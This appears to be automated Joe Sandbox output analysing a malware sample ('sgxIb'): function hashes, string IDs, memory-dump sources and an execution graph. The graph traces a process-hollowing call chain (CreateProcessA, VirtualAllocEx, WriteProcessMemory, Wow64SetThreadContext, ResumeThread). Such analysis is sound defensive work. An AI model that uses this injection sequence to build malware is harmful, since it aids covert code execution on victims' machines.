                                                    • Instruction Fuzzy Hash: 3E912E30E002099FEB68EF66D554BAE77F2FF84305F108929F402AB265DB759D85CB90
                                                    Function 065671B8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-390881366
                                                    • Opcode ID: 61068edf0bc6558d959e6cb310109ec58321cc702bc3a8c8247a68bc612059a4
                                                    • Instruction ID: 91b542f5c2feb7988d2a00f14b8f3240f24e560e9f947c8a9d7b9c646e423b05
                                                    • Opcode Fuzzy Hash: 61068edf0bc6558d959e6cb310109ec58321cc702bc3a8c8247a68bc612059a4
                                                    • Instruction Fuzzy Hash: 21F12134B00209CFDB55EBA9C594A5EB7F2FF88304F258568E4059B369DB75DC86CB80
                                                    Function 0656BB30 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-2392861976
                                                    • Opcode ID: a5755712e112ad1fffa2134173887e0b8c9c292332ab8a494932045a74a711b1
                                                    • Instruction ID: 5e2657acbf07ce8d2587696c329bf83a2d829ef044f531f5282d07838b283120
                                                    • Opcode Fuzzy Hash: a5755712e112ad1fffa2134173887e0b8c9c292332ab8a494932045a74a711b1
                                                    • Instruction Fuzzy Hash: 8D719F31E0020A8FDBA8DF69D5446AEB7F2FF84304B208969E406EF254DB71DD56CB81
                                                    Function 065684F0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q
                                                    • API String ID: 0-2125118731
                                                    • Opcode ID: c342699692a960a40120d9812d6733cd8ac44d9f60e6f67b4eac63c9dcc57166
                                                    • Instruction ID: 56ff8ffeeaa3141678206c0106abec292460d61aa429d17d03f1cc0e5c902be8
                                                    • Opcode Fuzzy Hash: c342699692a960a40120d9812d6733cd8ac44d9f60e6f67b4eac63c9dcc57166
                                                    • Instruction Fuzzy Hash: 7BB11D30F002089FDB64EF69D59469EB7B2FF84304F248929E406AB365DB75DC86CB91
                                                    Function 06568908 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LR^q$LR^q$$^q$$^q
                                                    • API String ID: 0-2454687669
                                                    • Opcode ID: 43c29f618056b8fbf7cabb26a8c1b492259d4740aa579996f860fb7ceac6ea27
                                                    • Instruction ID: fb0b56d4be994f4b1ea9333f265a11e3d86191c7449f19701f902f775d36773a
                                                    • Opcode Fuzzy Hash: 43c29f618056b8fbf7cabb26a8c1b492259d4740aa579996f860fb7ceac6ea27
                                                    • Instruction Fuzzy Hash: EB51B330B002059FDB58DF69D984A6E77E2FF85704F148968E4059F3A9DE30EC45CB91
                                                    Function 0656ADD8 Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q
                                                    • API String ID: 0-2125118731
                                                    • Opcode ID: 674564212fec17371164464e84ea3d964fa9eeefcfeb38ee989f6faa49e29885
                                                    • Instruction ID: b864922b1152fa6719c2cd5beb3e0670954440fba9cd4ebd20f4a2c5af7ef169
                                                    • Opcode Fuzzy Hash: 674564212fec17371164464e84ea3d964fa9eeefcfeb38ee989f6faa49e29885
                                                    • Instruction Fuzzy Hash: 91518B34E102059FDBA5DA65D980AAEB7F2FF88310F148929E415EB355DB31EC82CF91

                                                    Execution Graph

                                                    Execution Coverage:9.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:223
                                                    Total number of Limit Nodes:14
                                                    execution_graph 51392 ef4668 51393 ef467f 51392->51393 51394 ef468b 51393->51394 51396 ef4798 51393->51396 51397 ef479c 51396->51397 51401 ef48a8 51397->51401 51405 ef4898 51397->51405 51403 ef48cf 51401->51403 51402 ef49ac 51402->51402 51403->51402 51409 ef4508 51403->51409 51407 ef489c 51405->51407 51406 ef49ac 51406->51406 51407->51406 51408 ef4508 CreateActCtxA 51407->51408 51408->51406 51410 ef5938 CreateActCtxA 51409->51410 51412 ef59fb 51410->51412 51446 efd788 DuplicateHandle 51447 efd81e 51446->51447 51435 6bcdf00 51436 6bcdf08 CloseHandle 51435->51436 51437 6bcdf6f 51436->51437 51448 6bcb5d0 51449 6bcb60a 51448->51449 51450 6bcb69b 51449->51450 51451 6bcb686 51449->51451 51453 6bcaef8 3 API calls 51450->51453 51456 6bcaef8 51451->51456 51455 6bcb6aa 51453->51455 51458 6bcaf03 51456->51458 51457 6bcb691 51458->51457 51461 6bcbfdf 51458->51461 51467 6bcbff0 51458->51467 51462 6bcc00a 51461->51462 51473 6bcaf40 51461->51473 51464 6bcc017 51462->51464 51465 6bcc040 CreateIconFromResourceEx 51462->51465 51464->51457 51466 6bcc0be 51465->51466 51466->51457 51468 6bcaf40 CreateIconFromResourceEx 51467->51468 51469 6bcc00a 51468->51469 51470 6bcc017 51469->51470 51471 6bcc040 CreateIconFromResourceEx 51469->51471 51470->51457 51472 6bcc0be 51471->51472 51472->51457 51474 6bcc040 CreateIconFromResourceEx 51473->51474 51475 6bcc0be 51474->51475 51475->51462 51476 6bca2c0 51477 6bca30e DrawTextExW 51476->51477 51479 6bca366 51477->51479 51413 73d2210 51414 73d239b 51413->51414 51415 73d2236 51413->51415 51415->51414 51418 73d2488 51415->51418 51422 73d2490 51415->51422 51419 73d248f 51418->51419 51420 73d2495 PostMessageW 51418->51420 51419->51420 51421 73d24fc 51420->51421 51421->51415 51423 73d2495 PostMessageW 51422->51423 51424 73d24fc 51423->51424 51424->51415 51425 efd540 51426 efd586 GetCurrentProcess 51425->51426 51428 efd5d8 GetCurrentThread 51426->51428 51429 efd5d1 51426->51429 51430 efd60e 51428->51430 51431 efd615 GetCurrentProcess 51428->51431 51429->51428 51430->51431 51434 efd64b 51431->51434 51432 efd673 GetCurrentThreadId 51433 efd6a4 51432->51433 51434->51432 51438 efb1b0 51439 efb1bf 51438->51439 51441 efb298 51438->51441 51445 efb2a4 51441->51445 51442 efb2dc 51442->51439 51443 efb4e0 GetModuleHandleW 51444 efb50d 51443->51444 51444->51439 51445->51442 51445->51443 51480 6e9f096 51481 6e9f01d 51480->51481 51482 6e9f09c 51480->51482 51487 6e9f7e0 51481->51487 51505 6e9f856 51481->51505 51524 6e9f7f0 51481->51524 51483 6e9ef49 51488 6e9f7e4 51487->51488 51489 6e9f812 51488->51489 51542 73d04fc 51488->51542 51546 73d0262 51488->51546 51550 73d0a42 51488->51550 51554 73d0622 51488->51554 51559 73d0a26 51488->51559 51564 73d0a87 51488->51564 51569 73d0a04 51488->51569 51573 73d02a5 51488->51573 51577 73d032b 51488->51577 51581 73d0972 51488->51581 51585 73d0851 51488->51585 51591 73d0455 51488->51591 51597 73d019b 51488->51597 51602 73d0418 51488->51602 51606 73d031c 51488->51606 51489->51483 51506 6e9f859 51505->51506 51507 6e9f7e4 51505->51507 51508 73d04fc 2 API calls 51507->51508 51509 73d031c 2 API calls 51507->51509 51510 73d0418 2 API calls 51507->51510 51511 73d019b 2 API calls 51507->51511 51512 73d0455 2 API calls 51507->51512 51513 73d0851 2 API calls 51507->51513 51514 73d0972 2 API calls 51507->51514 51515 73d032b 2 API calls 51507->51515 51516 73d02a5 2 API calls 51507->51516 51517 73d0a04 2 API calls 51507->51517 51518 73d0a87 2 API calls 51507->51518 51519 73d0a26 2 API calls 51507->51519 51520 6e9f812 51507->51520 51521 73d0622 2 API calls 51507->51521 51522 73d0a42 2 API calls 51507->51522 51523 73d0262 2 API calls 51507->51523 51508->51520 51509->51520 51510->51520 51511->51520 51512->51520 51513->51520 51514->51520 51515->51520 51516->51520 51517->51520 51518->51520 51519->51520 51520->51483 51521->51520 51522->51520 51523->51520 51525 6e9f80a 51524->51525 51526 73d04fc 2 API calls 51525->51526 51527 73d031c 2 API calls 51525->51527 51528 73d0418 2 API calls 51525->51528 51529 73d019b 2 API calls 51525->51529 51530 73d0455 2 API calls 51525->51530 51531 73d0851 2 API calls 51525->51531 51532 73d0972 2 API calls 51525->51532 51533 73d032b 2 API calls 51525->51533 51534 73d02a5 2 API calls 51525->51534 51535 73d0a04 2 API calls 51525->51535 51536 73d0a87 2 API calls 51525->51536 51537 73d0a26 2 API calls 51525->51537 51538 6e9f812 51525->51538 51539 73d0622 2 API calls 51525->51539 51540 73d0a42 2 API calls 51525->51540 51541 73d0262 2 API calls 51525->51541 51526->51538 51527->51538 51528->51538 51529->51538 51530->51538 51531->51538 51532->51538 51533->51538 51534->51538 51535->51538 51536->51538 51537->51538 51538->51483 51539->51538 51540->51538 51541->51538 51610 6e9e7c8 51542->51610 51614 6e9e7c1 51542->51614 51543 73d02da 51548 6e9e7c8 WriteProcessMemory 51546->51548 51549 6e9e7c1 WriteProcessMemory 51546->51549 51547 73d0238 51547->51489 51548->51547 51549->51547 51618 73d0ee8 51550->51618 51623 73d0ed8 51550->51623 51551 73d0a5a 51555 73d0628 51554->51555 51557 6e9e7c8 WriteProcessMemory 51555->51557 51558 6e9e7c1 WriteProcessMemory 51555->51558 51556 73d065a 51557->51556 51558->51556 51560 73d0a2e 51559->51560 51561 73d0979 51559->51561 51636 73d0f30 51561->51636 51641 73d0f20 51561->51641 51565 73d0a41 51564->51565 51567 73d0ee8 2 API calls 51565->51567 51568 73d0ed8 2 API calls 51565->51568 51566 73d0a5a 51567->51566 51568->51566 51570 73d0979 51569->51570 51571 73d0f30 2 API calls 51570->51571 51572 73d0f20 2 API calls 51570->51572 51571->51570 51572->51570 51574 73d02ab 51573->51574 51575 73d0f30 2 API calls 51574->51575 51576 73d0f20 2 API calls 51574->51576 51575->51574 51576->51574 51654 6e9e8b8 51577->51654 51658 6e9e8b1 51577->51658 51578 73d0209 51578->51489 51582 73d0978 51581->51582 51583 73d0f30 2 API calls 51582->51583 51584 73d0f20 2 API calls 51582->51584 51583->51582 51584->51582 51586 73d0639 51585->51586 51587 73d0866 51585->51587 51589 6e9e7c8 WriteProcessMemory 51586->51589 51590 6e9e7c1 WriteProcessMemory 51586->51590 51587->51489 51588 73d065a 51589->51588 51590->51588 51592 73d07d2 51591->51592 51593 73d0462 51591->51593 51595 6e9e628 Wow64SetThreadContext 51592->51595 51596 6e9e630 Wow64SetThreadContext 51592->51596 51594 73d07ed 51594->51489 51595->51594 51596->51594 51598 73d01a1 51597->51598 51662 6e9ea50 51598->51662 51666 6e9ea44 51598->51666 51670 6e9e708 51602->51670 51674 6e9e700 51602->51674 51603 73d0436 51607 73d02bc 51606->51607 51608 73d0f30 2 API calls 51607->51608 51609 73d0f20 2 API calls 51607->51609 51608->51607 51609->51607 51611 6e9e810 WriteProcessMemory 51610->51611 51613 6e9e867 51611->51613 51613->51543 51615 6e9e7c8 WriteProcessMemory 51614->51615 51617 6e9e867 51615->51617 51617->51543 51619 73d0efd 51618->51619 51628 6e9e628 51619->51628 51632 6e9e630 51619->51632 51620 73d0f13 51620->51551 51624 73d0ee8 51623->51624 51626 6e9e628 Wow64SetThreadContext 51624->51626 51627 6e9e630 Wow64SetThreadContext 51624->51627 51625 73d0f13 51625->51551 51626->51625 51627->51625 51629 6e9e630 Wow64SetThreadContext 51628->51629 51631 6e9e6bd 51629->51631 51631->51620 51633 6e9e675 Wow64SetThreadContext 51632->51633 51635 6e9e6bd 51633->51635 51635->51620 51637 73d0f45 51636->51637 51646 6e9e148 51637->51646 51650 6e9e142 51637->51650 51638 73d0f58 51638->51561 51642 73d0f30 51641->51642 51644 6e9e148 ResumeThread 51642->51644 51645 6e9e142 ResumeThread 51642->51645 51643 73d0f58 51643->51561 51644->51643 51645->51643 51647 6e9e188 ResumeThread 51646->51647 51649 6e9e1b9 51647->51649 51649->51638 51651 6e9e148 ResumeThread 51650->51651 51653 6e9e1b9 51651->51653 51653->51638 51655 6e9e903 ReadProcessMemory 51654->51655 51657 6e9e947 51655->51657 51657->51578 51659 6e9e8b8 ReadProcessMemory 51658->51659 51661 6e9e947 51659->51661 51661->51578 51663 6e9ead9 CreateProcessA 51662->51663 51665 6e9ec9b 51663->51665 51667 6e9ead9 CreateProcessA 51666->51667 51669 6e9ec9b 51667->51669 51671 6e9e748 VirtualAllocEx 51670->51671 51673 6e9e785 51671->51673 51673->51603 51675 6e9e708 VirtualAllocEx 51674->51675 51677 6e9e785 51675->51677 51677->51603

                                                    Executed Functions

                                                    Function 0745E7E0 Relevance: 11.0, Strings: 8, Instructions: 971COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 297 745e7e0-745e7ff 298 745e805-745e80b 297->298 299 745e9ad-745e9fe 297->299 300 745e80d-745e814 298->300 301 745e84c-745e860 298->301 327 745ea00-745ea0d 299->327 328 745ea18-745ea32 299->328 305 745e816-745e823 300->305 306 745e82e-745e847 call 745cfc0 300->306 302 745e882-745e88b 301->302 303 745e862-745e866 301->303 308 745e8a5-745e8c1 302->308 309 745e88d-745e89a 302->309 303->302 307 745e868-745e874 303->307 305->306 306->301 307->302 317 745e876-745e87c 307->317 320 745e8c7-745e8d2 308->320 321 745e969-745e98d 308->321 309->308 317->302 329 745e8d4-745e8da 320->329 330 745e8ea-745e8f1 320->330 331 745e997 321->331 332 745e98f 321->332 327->328 341 745ea34-745ea3b 328->341 342 745ea79-745ea80 328->342 333 745e8dc 329->333 334 745e8de-745e8e0 329->334 335 745e905-745e928 call 74589d4 330->335 336 745e8f3-745e8fd 330->336 331->299 332->331 333->330 334->330 344 745e939-745e94a 335->344 345 745e92a-745e937 335->345 336->335 346 745ea55-745ea6a 341->346 347 745ea3d-745ea4a 341->347 348 745ea82-745ea8f 342->348 349 745ea9a-745eaa3 342->349 358 745e957-745e963 344->358 359 745e94c-745e94f 344->359 345->344 345->358 346->342 360 745ea6c-745ea73 346->360 347->346 348->349 350 745eaa5-745eaa7 349->350 351 745eaa9-745eaac 349->351 353 745eaad-745eab1 350->353 351->353 361 745eab9-745eabe 353->361 358->320 358->321 359->358 360->342 362 745eb07 360->362 363 745eb01-745eb04 361->363 364 745eac0-745eac7 361->364 365 745eb0a-745eb32 362->365 367 745eae1-745eaf6 364->367 368 745eac9-745ead6 364->368 374 745eb39-745eb70 365->374 367->363 372 745eaf8-745eaff 367->372 368->367 372->363 372->374 374->365 382 745eb72-745eb9a 374->382 383 745ebb2-745ebb8 382->383 384 745eb9c-745ebaf 382->384 385 745ec28-745ec80 383->385 386 745ebba-745ebc1 383->386 388 745ec87-745ecdf 385->388 386->388 389 745ebc7-745ebd7 386->389 394 745ece6-745edf4 388->394 389->394 395 745ebdd-745ebe1 389->395 436 745ee46-745ee9e 394->436 437 745edf6-745ee06 394->437 397 745ebe4-745ebe6 395->397 400 745ebe8-745ebf8 397->400 401 745ec0b-745ec0d 397->401 409 745ebe3 400->409 410 745ebfa-745ec09 400->410 402 745ec1c-745ec25 401->402 403 745ec0f-745ec19 401->403 409->397 410->401 410->409 440 745eea5-745efb2 436->440 437->440 441 745ee0c-745ee10 437->441 475 745efb4-745efc7 440->475 476 745efca-745efd0 440->476 443 745ee13-745ee15 441->443 444 745ee17-745ee27 443->444 445 745ee29-745ee2b 443->445 444->445 452 745ee12 444->452 447 745ee2d-745ee37 445->447 448 745ee3a-745ee43 445->448 452->443 477 745efd2-745efd9 476->477 478 745f04a-745f0a2 476->478 480 745efdf-745efe3 477->480 481 745f0a9-745f101 477->481 478->481 482 745efe9-745efed 480->482 483 745f108-745f183 480->483 481->483 485 745eff0-745effd 482->485 520 745f184-745f1e8 483->520 492 745f022-745f02f 485->492 493 745efff-745f00f 485->493 500 745f031-745f03b 492->500 501 745f03e-745f047 492->501 502 745f011-745f020 493->502 503 745efef 493->503 502->492 502->503 503->485 529 745f1ea-745f20c 520->529 530 745f20e-745f212 529->530 531 745f268-745f2c0 529->531 532 745f2c7-745f3c0 530->532 533 745f218-745f21c 530->533 531->532 571 745f3c2-745f3c8 532->571 572 745f3d8-745f3d9 532->572 534 745f21f-745f22c 533->534 540 745f240-745f24d 534->540 541 745f22e-745f23e 534->541 548 745f25c-745f265 540->548 549 745f24f-745f259 540->549 541->540 547 745f21e 541->547 547->534 573 745f3cc-745f3ce 571->573 574 745f3ca 571->574 573->572 574->572
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
                                                    • API String ID: 0-3076519024
                                                    • Opcode ID: 6c1395ade1dccd6bb3abbe4bdd94dc410c5514aa08275cc1fc33bb0975e0e64b
                                                    • Instruction ID: 49115f6dfaabad3d1ba98b42ddd82f0c9dda09be7e086edb8c74da0466a6677d
                                                    • Opcode Fuzzy Hash: 6c1395ade1dccd6bb3abbe4bdd94dc410c5514aa08275cc1fc33bb0975e0e64b
                                                    • Instruction Fuzzy Hash: 3772BFB1B002158FDB54EB78C8546AE7BA6BFC8310F248569E40ADF3A5CE34DD46C791
                                                    Function 07452106 Relevance: 1.8, Strings: 1, Instructions: 561COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D
                                                    • API String ID: 0-2746444292
                                                    • Opcode ID: da0080acecd425ee1cf0ec9b4d91e3c268a8c5b87c03ff7c32697f7563722eb6
                                                    • Instruction ID: ffa1dd3819176af6525e18b0e3261d0451d9c294ffdf8a14b01e60fa8821ba10
                                                    • Opcode Fuzzy Hash: da0080acecd425ee1cf0ec9b4d91e3c268a8c5b87c03ff7c32697f7563722eb6
                                                    • Instruction Fuzzy Hash: A852B874A01218DFCB54DF68D998A9EBBB6FF89300F1045E9D509A7365CB34AE81CF50
                                                    Function 00EFD530 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 575 efd530-efd532 576 efd536-efd538 575->576 577 efd534 575->577 578 efd4fd-efd52f 576->578 579 efd53a 576->579 577->576 581 efd53e-efd5cf GetCurrentProcess 579->581 582 efd53c-efd53d 579->582 588 efd5d8-efd60c GetCurrentThread 581->588 589 efd5d1-efd5d7 581->589 582->581 591 efd60e-efd614 588->591 592 efd615-efd649 GetCurrentProcess 588->592 589->588 591->592 594 efd64b-efd651 592->594 595 efd652-efd66d call efd70f 592->595 594->595 598 efd673-efd6a2 GetCurrentThreadId 595->598 599 efd6ab-efd70d 598->599 600 efd6a4-efd6aa 598->600 600->599
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 00EFD5BE
                                                    • GetCurrentThread.KERNEL32 ref: 00EFD5FB
                                                    • GetCurrentProcess.KERNEL32 ref: 00EFD638
                                                    • GetCurrentThreadId.KERNEL32 ref: 00EFD691
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1922038730.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_ef0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID: 4'^q
                                                    • API String ID: 2063062207-1614139903
                                                    • Opcode ID: d4f55c8413dc80882ad702b3fb04caac059707a5dc480c47e0027d049b67aab9
                                                    • Instruction ID: 1c7d06f99294fd7efa6d0688d53a1854a5072bb922b7323074d51fbb14d32b80
                                                    • Opcode Fuzzy Hash: d4f55c8413dc80882ad702b3fb04caac059707a5dc480c47e0027d049b67aab9
                                                    • Instruction Fuzzy Hash: DE5158B0904349CFDB04DFA9D948BEEBFF2EB89304F208469D149A7261DB315984CF65
                                                    Function 00EFD540 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 798 efd540-efd5cf GetCurrentProcess 802 efd5d8-efd60c GetCurrentThread 798->802 803 efd5d1-efd5d7 798->803 804 efd60e-efd614 802->804 805 efd615-efd649 GetCurrentProcess 802->805 803->802 804->805 807 efd64b-efd651 805->807 808 efd652-efd66d call efd70f 805->808 807->808 811 efd673-efd6a2 GetCurrentThreadId 808->811 812 efd6ab-efd70d 811->812 813 efd6a4-efd6aa 811->813 813->812
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 00EFD5BE
                                                    • GetCurrentThread.KERNEL32 ref: 00EFD5FB
                                                    • GetCurrentProcess.KERNEL32 ref: 00EFD638
                                                    • GetCurrentThreadId.KERNEL32 ref: 00EFD691
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1922038730.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_ef0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 5f5df8712fd44dbcab7f1a6f98580bc4ddca0a0dcd2755266e6ee2502456196c
                                                    • Instruction ID: 948d32030885cc00a37e319153b568bd3ae20c245fbdec9f22a07ba58df5e8c9
                                                    • Opcode Fuzzy Hash: 5f5df8712fd44dbcab7f1a6f98580bc4ddca0a0dcd2755266e6ee2502456196c
                                                    • Instruction Fuzzy Hash: CD5125B0900349CFDB14DFA9D948BEEBBF1EB88318F208469D119A7260DB759984CF65
                                                    Function 0745D570 Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1049 745d570-745d5b6 1052 745d5bc-745d5cf 1049->1052 1053 745d979-745d9a4 1049->1053 1056 745d5d1-745d5db 1052->1056 1057 745d5e3-745d609 1052->1057 1065 745d9ab-745d9fb 1053->1065 1056->1057 1057->1065 1066 745d60f-745d625 call 745cd34 1057->1066 1097 745d9fd-745da09 1065->1097 1098 745da1c-745da24 1065->1098 1071 745d707-745d70b 1066->1071 1072 745d62b-745d645 1066->1072 1073 745d70d-745d713 1071->1073 1074 745d71b-745d72b call 745cd44 1071->1074 1079 745d647-745d655 1072->1079 1080 745d65d-745d679 1072->1080 1073->1074 1082 745d762-745d780 call 745cd54 1074->1082 1083 745d72d-745d756 1074->1083 1079->1080 1091 745d6d6-745d6fa 1080->1091 1092 745d67b-745d686 1080->1092 1095 745d785-745d79c call 745a3b8 1082->1095 1110 745d704 1091->1110 1111 745d6fc 1091->1111 1104 745d69e-745d6af 1092->1104 1105 745d688-745d68e 1092->1105 1102 745d7b4-745d7d0 1095->1102 1103 745d79e-745d7ac 1095->1103 1112 745da11 1097->1112 1120 745d844-745d868 1102->1120 1121 745d7d2-745d7dd 1102->1121 1103->1102 1116 745d6b6-745d6b9 1104->1116 1117 745d6b1-745d6b4 1104->1117 1108 745d690 1105->1108 1109 745d692-745d694 1105->1109 1108->1104 1109->1104 1110->1071 1111->1110 1112->1098 1118 745d6bc-745d6d4 1116->1118 1117->1118 1118->1091 1118->1092 1131 745d872 1120->1131 1132 745d86a 1120->1132 1127 745d7f5-745d802 1121->1127 1128 745d7df-745d7e5 1121->1128 1129 745d804-745d810 1127->1129 1130 745d816-745d842 call 7453b64 1127->1130 1133 745d7e7 1128->1133 1134 745d7e9-745d7eb 1128->1134 1129->1130 1130->1120 1130->1121 1131->1053 1132->1131 1133->1127 1134->1127
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q$PH^q
                                                    • API String ID: 0-1598597984
                                                    • Opcode ID: 99fa989d837570ec8051a3b7c1f858f288d8110e55bb24ef88417abb90eee27a
                                                    • Instruction ID: aa9fa1dc775393651473cfe1e101498d4fd84451edf1fdd937a4543269a0a2aa
                                                    • Opcode Fuzzy Hash: 99fa989d837570ec8051a3b7c1f858f288d8110e55bb24ef88417abb90eee27a
                                                    • Instruction Fuzzy Hash: 5DC1E674B002058FCB14DF69C598AA9BBF2FF89314B1545A9E816AB3A2DB31EC45CF50
                                                    Function 06E9EA44 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E9EC86
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 922b3991f154c0b91fed774c1366d3385b30c9440ff18e21ac72fb4b57688812
                                                    • Instruction ID: 3bf8ec1e4c55f3265df39144c18e6a4ac36d9d3999d431788b4d3561e87ebec7
                                                    • Opcode Fuzzy Hash: 922b3991f154c0b91fed774c1366d3385b30c9440ff18e21ac72fb4b57688812
                                                    • Instruction Fuzzy Hash: 1FA16971D00319DFDF60CF68C841BEDBBB2AF48314F1485A9E949A7244EB749985CFA2
                                                    Function 06E9EA50 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E9EC86
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 03577cca6c00c3d5ccc621c449083c882bd895101f5fbd09ff5ca3104274212b
                                                    • Instruction ID: 1d2621638bc19585c1ef10e2a4233ba994fa301621334ad3c6bb49ab8bd8fc32
                                                    • Opcode Fuzzy Hash: 03577cca6c00c3d5ccc621c449083c882bd895101f5fbd09ff5ca3104274212b
                                                    • Instruction Fuzzy Hash: 9C916971D00319DFDF60CF68C841BEDBBB2AF44314F1485A9E949A7244EB749985CFA1
                                                    Function 0745B5D4 Relevance: 1.7, Strings: 1, Instructions: 486COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq
                                                    • API String ID: 0-149360118
                                                    • Opcode ID: acc9133be88fb3246240e27ee27703f41b4a1019ba32dc4fb58794181ad5b389
                                                    • Instruction ID: ada5b7616609255b7abf2cc90cb22eb14e94a3c18b1d55761f3b4029fd30c461
                                                    • Opcode Fuzzy Hash: acc9133be88fb3246240e27ee27703f41b4a1019ba32dc4fb58794181ad5b389
                                                    • Instruction Fuzzy Hash: 521218B47001059FCB54DF68D498AAEBBF2FF89314F1585A9E4099B3A6DB30EC85CB50
